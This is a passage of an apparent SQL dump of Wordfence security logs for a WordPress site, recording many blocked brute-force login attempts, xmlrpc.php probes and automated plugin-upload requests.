Network',NULL),(11397,0.000000,1630826513.802591,'\0\0\0\0\0\0\0\0\0\0���9�8',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11398,0.000000,1630827307.018538,'\0\0\0\0\0\0\0\0\0\0���(%�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11399,0.000000,1630828103.631109,'\0\0\0\0\0\0\0\0\0\0���Z�w',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11400,0.000000,1630829692.395566,'\0\0\0\0\0\0\0\0\0\0����8�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11401,0.000000,1630830488.976737,'\0\0\0\0\0\0\0\0\0\0��E��p',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11402,0.000000,1630831282.259531,'\0\0\0\0\0\0\0\0\0\0��3Kȷ',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11403,0.000000,1630832879.148019,'\0\0\0\0\0\0\0\0\0\0���D�\0',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11404,0.000000,1630833669.033450,'\0\0\0\0\0\0\0\0\0\0��]qo6',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11405,0.000000,1630834176.030788,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11406,1630834178.442769,1630834178.162200,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11407,0.000000,1630834473.407700,'\0\0\0\0\0\0\0\0\0\0��#��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11408,0.000000,1630835507.127121,'\0\0\0\0\0\0\0\0\0\0���6�D',0,200,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','loginFailInvalidUsername',NULL,NULL),(11409,0.000000,1630836177.983108,'\0\0\0\0\0\0\0\0\0\0��g�ڲ',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11410,0.000000,1630836274.893680,'\0\0\0\0\0\0\0\0\0\0�����l',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11411,0.000000,1630837042.210938,'\0\0\0\0\0\0\0\0\0\0��ν2�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11412,0.000000,1630837896.233165,'\0\0\0\0\0\0\0\0\0\0��@�I�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11413,0.000000,1630839046.266776,'\0\0\0\0\0\0\0\0\0\0����g',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11414,0.000000,1630848164.975668,'\0\0\0\0\0\0\0\0\0\0��^�g',0,200,0,1,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','loginFailValidUsername',NULL,NULL),(11415,0.000000,1630851103.160401,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11416,1630851105.921537,1630851105.809400,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11417,0.000000,1630851237.533607,'\0\0\0\0\0\0\0\0\0\0���6�D',0,200,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53','loginFailInvalidUsername',NULL,NULL),(11418,0.000000,1630851635.175021,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11419,0.000000,1630859764.787931,'\0\0\0\0\0\0\0\0\0\0���6�J',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11420,1630859766.930902,1630859766.851600,'\0\0\0\0\0\0\0\0\0\0���6�J',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11421,0.000000,1630860048.782851,'\0\0\0\0\0\0\0\0\0\0����\"',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11422,0.000000,1630860403.408635,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11423,1630860406.302582,1630860406.187800,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11424,0.000000,1630862441.882299,'\0\0\0\0\0\0\0\0\0\0��>Ҵ�',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11425,0.000000,1630868986.228141,'\0\0\0\0\0\0\0\0\0\0���6�J',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11426,1630868988.263492,1630868988.187800,'\0\0\0\0\0\0\0\0\0\0���6�J',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11427,0.000000,1630869112.045836,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11428,0.000000,1630869126.427234,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11429,1630869127.755529,1630869127.672000,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11430,0.000000,1630871072.995295,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11431,0.000000,1630871796.820545,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,1,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','loginFailValidUsername',NULL,NULL),(11432,0.000000,1630877967.778768,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11433,1630877969.715656,1630877969.624400,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11434,1630878183.008504,1630878182.913000,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(11435,0.000000,1630880545.259866,'\0\0\0\0\0\0\0\0\0\0���*t',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 OPR/48.0.2685.52','loginFailInvalidUsername',NULL,NULL),(11436,0.000000,1630883551.225388,'\0\0\0\0\0\0\0\0\0\0��\rԀh',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11437,0.000000,1630886719.590289,'\0\0\0\0\0\0\0\0\0\0���6�E',0,200,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11438,0.000000,1630887093.130877,'\0\0\0\0\0\0\0\0\0\0���6�E',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11439,1630887104.164052,1630887104.075400,'\0\0\0\0\0\0\0\0\0\0���6�E',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11440,0.000000,1630902612.219292,'\0\0\0\0\0\0\0\0\0\0���D��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11441,0.000000,1630903433.440909,'\0\0\0\0\0\0\0\0\0\0��E��x',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11442,0.000000,1630904258.000449,'\0\0\0\0\0\0\0\0\0\0��`}��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11443,0.000000,1630905080.863413,'\0\0\0\0\0\0\0\0\0\0��tv0�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11444,0.000000,1630905884.259121,'\0\0\0\0\0\0\0\0\0\0��QX4r',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11445,0.000000,1630906681.146640,'\0\0\0\0\0\0\0\0\0\0���aD�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11446,0.000000,1630907196.831914,'\0\0\0\0\0\0\0\0\0\0���_�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11447,0.000000,1630907463.255832,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11448,0.000000,1630908245.760754,'\0\0\0\0\0\0\0\0\0\0����8�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11449,0.000000,1630909024.986809,'\0\0\0\0\0\0\0\0\0\0��R�,�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11450,0.000000,1630910558.600128,'\0\0\0\0\0\0\0\0\0\0����~h',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11451,0.000000,1630911203.023247,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11452,1630911205.010237,1630911204.930800,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11453,0.000000,1630912072.729724,'\0\0\0\0\0\0\0\0\0\0����^�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11454,0.000000,1630912830.633206,'\0\0\0\0\0\0\0\0\0\0����~h',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11455,0.000000,1630913590.347846,'\0\0\0\0\0\0\0\0\0\0�����B',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11456,0.000000,1630914366.805433,'\0\0\0\0\0\0\0\0\0\0��E�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11457,0.000000,1630915131.994705,'\0\0\0\0\0\0\0\0\0\0��mW�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11458,0.000000,1630915915.015408,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11459,0.000000,1630916694.098303,'\0\0\0\0\0\0\0\0\0\0����E.',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11460,0.000000,1630917464.716185,'\0\0\0\0\0\0\0\0\0\0��gZ��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11461,0.000000,1630918246.473140,'\0\0\0\0\0\0\0\0\0\0��\"z[',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11462,0.000000,1630919020.416309,'\0\0\0\0\0\0\0\0\0\0���1L',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11463,0.000000,1630919802.596897,'\0\0\0\0\0\0\0\0\0\0����\\�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11464,0.000000,1630920631.160304,'\0\0\0\0\0\0\0\0\0\0��QEˣ',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11465,0.000000,1630921542.516637,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11466,0.000000,1630921976.742048,'\0\0\0\0\0\0\0\0\0\0��\"�w5',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11467,0.000000,1630922473.018507,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11468,0.000000,1630923406.596811,'\0\0\0\0\0\0\0\0\0\0���H�%',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11469,0.000000,1630924388.860248,'\0\0\0\0\0\0\0\0\0\0��/��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11470,0.000000,1630925355.531348,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11471,0.000000,1630927287.034967,'\0\0\0\0\0\0\0\0\0\0��#��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11472,0.000000,1630929180.409839,'\0\0\0\0\0\0\0\0\0\0���㪽',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11473,0.000000,1630930131.934293,'\0\0\0\0\0\0\0\0\0\0���捫',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11474,0.000000,1630932023.236530,'\0\0\0\0\0\0\0\0\0\0����\"E',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11475,0.000000,1630932584.578174,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0','loginFailInvalidUsername',NULL,NULL),(11476,0.000000,1630932962.914400,'\0\0\0\0\0\0\0\0\0\0��-(��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11477,0.000000,1630933423.307971,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11478,1630933425.049458,1630933424.939100,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11479,0.000000,1630933832.769296,'\0\0\0\0\0\0\0\0\0\0���6�J',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security 